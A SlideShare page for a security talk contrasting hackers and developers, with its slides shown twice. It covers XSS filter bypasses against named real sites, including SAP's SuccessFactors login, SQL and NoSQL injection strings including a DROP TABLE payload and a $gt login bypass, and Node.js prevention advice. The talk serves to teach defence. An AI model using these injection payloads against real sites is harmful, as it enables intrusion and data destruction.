SlideShare ist ein Scribd-Unternehmen logo

Hackers vs developers

Als PPTX, PDF herunterladen
Soumyasanto Sen
Soumyasanto Sen

Hackers and developers are compared in the document. Hackers are described as skillful with deep technical understanding but often unsocial and focused on breaking systems. Developers are portrayed as true professionals who work with people to build applications and believe they can change the world. The document then provides examples of how hacking can look simple, such as cross-site scripting attacks on websites. It offers suggestions for prevention including input sanitization and access control. Later it discusses hacking in Node.js and risks of SQL and NoSQL injection. Finally it addresses how hacking and development skills could be applied for social good or security testing.

Technologie
1 von 36
Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
#sitWDF
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
#sitWDF #sitWDF
#sitWDF
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering
Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
#sitWDF #sitWDF
#sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
#sitWDF
Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
Make Difference #sitWDF
Make Difference #sitWDF Source: Scott Hanselman
#sitWDF
Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours
#sitWDF Thank You Soumyasanto Sen @soumyasanto

Empfohlen

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
Vlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJS
Thang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San Francisco
Aditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is Evolving
Jarrod Overson
 

Empfohlen

Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
SecuRing
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
Vlad Savitsky
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
Sastry Tumuluri
 
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
[1.2] Трюки при анализе защищенности веб приложений – продвинутая версия - С...
OWASP Russia
 
Secure Coding for NodeJS
Secure Coding for NodeJSSecure Coding for NodeJS
Secure Coding for NodeJS
Thang Chung
 
RSA Conference 2010 San Francisco
RSA Conference 2010 San FranciscoRSA Conference 2010 San Francisco
RSA Conference 2010 San Francisco
Aditya K Sood
 
The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.The State of Credential Stuffing and the Future of Account Takeovers.
The State of Credential Stuffing and the Future of Account Takeovers.
Jarrod Overson
 
AppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is EvolvingAppSecCali - How Credential Stuffing is Evolving
AppSecCali - How Credential Stuffing is Evolving
Jarrod Overson
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Balavignesh Kasinathan
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
David Paluy
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Michael Peters
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
Steven Van den Hout
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
Calibrate
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Damon Cortesi
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
slicklash
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
jessepollak
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
Francisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
Mahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
Coverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
Cliff Smith
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
morisson
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
Ran Bar-Zik
 
Interpolique
InterpoliqueInterpolique
Interpolique
Dan Kaminsky
 
Interpolique
InterpoliqueInterpolique
Interpolique
Dan Kaminsky
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
MadyBayot
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
 

Weitere ähnliche Inhalte

Ähnlich wie Hackers vs developers

Security on Rails
Security on RailsSecurity on Rails
Security on Rails
David Paluy
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
Slawomir Jasek
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
Francisco Ribeiro
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
Mahesh Reddy
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
Coverity
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
Mario Heiderich
 

Ähnlich wie Hackers vs developers (20)

PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Security on Rails
Security on RailsSecurity on Rails
Security on Rails
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal Development
 
Drupal Security Seminar
Drupal Security SeminarDrupal Security Seminar
Drupal Security Seminar
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Security of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To AvoidSecurity of Web Applications: Top 6 Risks To Avoid
Security of Web Applications: Top 6 Risks To Avoid
 
Anatomy of a WordPress Hack
Anatomy of a WordPress HackAnatomy of a WordPress Hack
Anatomy of a WordPress Hack
 
Not so blind SQL Injection
Not so blind SQL InjectionNot so blind SQL Injection
Not so blind SQL Injection
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
jQuery presentation
jQuery presentationjQuery presentation
jQuery presentation
 
DevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first SecurityDevBeat 2013 - Developer-first Security
DevBeat 2013 - Developer-first Security
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Something Died Inside Your Git Repo
Something Died Inside Your Git RepoSomething Died Inside Your Git Repo
Something Died Inside Your Git Repo
 
Crash Course In Brain Surgery
Crash Course In Brain SurgeryCrash Course In Brain Surgery
Crash Course In Brain Surgery
 
Drupal Security
Drupal SecurityDrupal Security
Drupal Security
 
Interpolique
InterpoliqueInterpolique
Interpolique
 
Interpolique
InterpoliqueInterpolique
Interpolique
 

Kürzlich hochgeladen

Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
Overkill Security
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Victor Rentea
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Orbitshub
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
Overkill Security
 

Kürzlich hochgeladen (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Cyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdfCyberprint. Dark Pink Apt Group [EN].pdf
Cyberprint. Dark Pink Apt Group [EN].pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
Modular Monolith - a Practical Alternative to Microservices @ Devoxx UK 2024
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Ransomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdfRansomware_Q4_2023. The report. [EN].pdf
Ransomware_Q4_2023. The report. [EN].pdf
 

Hackers vs developers

  • 1. Soumyasanto Sen, #sitWDF Hackers versus Developers The GAME is ON
  • 2. Introduction Player 1 : Hackers Expert: Skillful, with detailed understanding of some area deeply, often scarily deeply. Unsocial: Don’t want to come out of the shell. Breaker: Hack Apps Cool: People think that they are cool and they think they are Awesome. Super Power: They believe that they can be "Masters of the Universe" #sitWDF Controller: Can use lot of Systems and Languages and get them talk to each other. Social: True and broad professionals, work with people and communicate well Builder: Create Apps Boring: There are other more important things in life than just coding. Super Power: They believe they can change this World. Player 2 : Developers VS
  • 6. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) decodeURI: decodes encoded URI http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic="xx xxxxxx'yyyyy</img Possibilities: • '-confirm(1)-' • '-confirm`1`-' http://t.home.news.cn/spIndex.action?ds=all&h=458&pageSize=20&temp=topicRoll&topic='-c onfirm(1)-‘ var topic = decodeURI('');confirm(1);(''); var topic = decodeURI('');confirm(1);//');
  • 7. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 8. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting JavaScript's Built-In Function(s) replace (JS String replace Method): returns a string after a pattern http://www.zaobao.com.sg/search/site/"xxxxxxxx'yyyyy</img Possibilities: http://www.zaobao.com.sg/search/site/"-confirm(1)-" http://www.zaobao.com.sg/search/site/");confirm(1);(" http://www.zaobao.com.sg/search/site/");confirm(1);// (does not work because // is filtered)
  • 9. Hacking looks ‘Simple’ #sitWDF XSS - Cross Site Scripting
  • 10. Easy Rules #sitWDF Preventions • XSS (Cross Site Scripting) Prevention Cheat Sheet from OWASP • HTML5 Security Clean Sheet • Secure Coding Practice Guidelines • Use Clean URL's: https://www.site.com/news.php?id=1337 is way more tempting than https://www.site.com/news/some-news-or-today • Sanitize Inputs: Must for XSS • Controlling Access Control: http://www.site.com/phpmyadmin gave us access to comple te database! No injection, nothing • Validation on Input. • Use White-Listing • Switch-Off Errors.
  • 11. Easy Rules #sitWDF Remember “Successful hackers are not just good at hacking. What makes a great hacker successful is that they are excellent at understanding human nature.” ( Developers love their code, just like its their child. ) “Do not trust anything ever, specially when it comes to user input.” “Security is about layers. It has to be because no single layer can be guaranteed to actually be secure” Security is nothing but an ILLUSION.
  • 14. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter '-confirm(1)-' was enough to break SAP's SuccessFactors's XSS filter and were able to make hundreds of web applications vulnerable ... https://jobs.sap.com/talentcommunity/login/?returnurl="xxxxxxxx'yyyyy</img Possibilities: • </script><script>alert(1)</script> • '-confirm(1)-'
  • 15. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter https://jobs.sap.com/talentcommunity/login/?returnurl=</script><script>alert(1)</script> Next Vector: <img src=x onerror=alert(1)>
  • 16. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vector: <img src=x onerror=confirm(1)> Next Vector: <a href=javascript:confirm(1)>click</a>
  • 17. Hacking looks ‘Simple’ Even for #sitWDF Breaking SuccessFactors's XSS Filter Next Vectors: • <p onmouseover=prompt(1)>IamParagraph</p> • <details ontoggle=confirm(1)> • <input type=search onsearch=confirm(1)>
  • 20. Easy Filtering #sitWDF Context Based Filtering Protection against JavaScript execution via `url` e.g., img'ssrc and/or anchor's href attribute Impleme ntation of `urlContextCleaner()`
  • 21. Easy Filtering #sitWDF External HTML Sanitizer https://developers.google.com/caja/ The Caja project includes a html-sanitizer Example: <script src="html-sanitizer-minified.js"></script> <script> function urlX(url) { if(/^https?:///.test(url)) { return url }} function idX(id) { return id } alert(html_sanitize('<b>hello</b><img src="http://asdf"><a href="javascript:alert(0)"> <script src="http://dfd"></script>', urlX, idX)) </script>
  • 23. #sitWDF Node.js is a JavaScript runtime built on Chrome's V8 JavaScript engine
  • 24. Hacking in Node.js #sitWDF Off Course XSS Improper parsing of nested tags and Incomplete filtering of javascript: URIs <s <onmouseover="alert(1)"> <s onmouseover="alert(1)">This is a test</s> <a href="javascriptJ a V a S c R iPt::alert(1)" "<s>">test</a> (With any Encoding)
  • 25. Hacking in Node.js #sitWDF Server Side JavaScript Injection Simple JS Command: response.end(“Ended Response”); [pid 25170] execve("/bin/sh", ["/bin/sh", "-c", "ls -l user input"],
  • 26. Hacking in Node.js #sitWDF SQL and NoSQL Injection Classic SQL Injection Bypass SELECT * FROM users WHERE username = '$username' AND password = '$password‘ (SELECT * FROM users WHERE username = '' or 1=1--' AND password = '‘) select author from books where id=$id -> (select author from books where id=2 or 1=1) Statement stmt = conn.createStatement("INSERT INTO students VALUES('" + user + "')"); stmt.execute(); (Robert'); DROP TABLE students; --) db.users.find({username: username, password: password}); (NoSQL) { "username": {"$gt": ""}, "password": {"$gt": ""} }
  • 27. Secure Node.js #sitWDF Protection XSS Prevention • Sanitize untrusted HTML http://jsxss.com/en/index.html https://github.com/theSmaw/Caja-HTML-Sanitizer https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project SSJSI Prevention • Substitution of the eval() with the JSON.parse() function, the code is no longer injectable • Use child_process.execFile or child_process.spawn instead of child_process.exec
  • 28. Secure Node.js #sitWDF Protection SQL and NoSQL Injection Prevention • Using Parameterize SQL var q = 'SELECT name FROM books WHERE id = $1'; client.query(q, ['3'], function(err, result) {}); • PreparedStatements avoid/prevent SQL Injection Statement stmt = conn.prepareStatement("INSERT INTO student VALUES(?)"); stmt.setString(1, user); stmt.execute(); (Use the $in Operator to Match Values) db.users.find({user: { $in: [user] }, pass: { $in: [pass] }}); (NoSQL)
  • 30. Positive Side • Social Good: find solution for social benefit, operations and emergencies • Penetration Testing: to find vulnerabilities that an attacker could exploit • open-source: much of this open-source code is produced, tested and improved by hackers, usually like hackathons #sitWDF Good Cause
  • 31. Negative Side • Corruption of government officials (58.0%) • Cyber-terrorism (44.8%) • Corporate tracking of personal information (44.6%) • Terrorist attacks (44.4%) • Government tracking of personal information (41.4%) • Bio-warfare (40.9%) • Identity theft (39.6%) • Economic collapse (39.2%) • Running out of money in the future (37.4%) • Credit card fraud (36.9%) • Source: Chapman University #sitWDF Top 10 fears of 2015
  • 35. Who is the Winner? A "Hacker" is a state of mind. A “Developer" is a state of function. #sitWDF Choice is Yours